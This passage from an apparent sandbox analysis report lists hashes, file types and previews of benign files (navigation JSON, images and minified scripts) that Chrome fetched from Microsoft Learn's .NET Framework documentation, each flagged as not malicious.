                                                                                                                                                                                                        Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5644
                                                                                                                                                                                                        Entropy (8bit):4.785769732002188
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                        MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                        SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                        SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                        SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):17174
                                                                                                                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13842
                                                                                                                                                                                                        Entropy (8bit):7.802399161550213
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                        MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                        SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                        SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                        SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                                        Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):33148
                                                                                                                                                                                                        Entropy (8bit):4.917595394577667
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                        MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                        SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                        SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                        SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5644
                                                                                                                                                                                                        Entropy (8bit):4.785769732002188
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                        MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                        SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                        SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                        SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                                        Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):64291
                                                                                                                                                                                                        Entropy (8bit):7.964191793580486
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                                        MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                                        SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                                        SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                                        SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):35005
                                                                                                                                                                                                        Entropy (8bit):7.980061050467981
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                        MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                        SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                        SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                        SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                                        Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4897
                                                                                                                                                                                                        Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                        MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                        SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                        SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                        SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                                        Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                        Entropy (8bit):4.241202481433726
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                        MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                        SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                        SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                        SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):64291
                                                                                                                                                                                                        Entropy (8bit):7.964191793580486
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                                        MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                                        SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                                        SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                                        SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
                                                                                                                                                                                                        Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1173007
                                                                                                                                                                                                        Entropy (8bit):5.503893944397598
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                        MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                        SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                        SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                        SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1817143
                                                                                                                                                                                                        Entropy (8bit):5.501007973622959
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                        MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                        SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                        SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                        SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1432
                                                                                                                                                                                                        Entropy (8bit):4.986131881931089
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                        MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                        SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                        SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                        SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1154
                                                                                                                                                                                                        Entropy (8bit):4.59126408969148
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                        MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                        SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                        SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                        SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
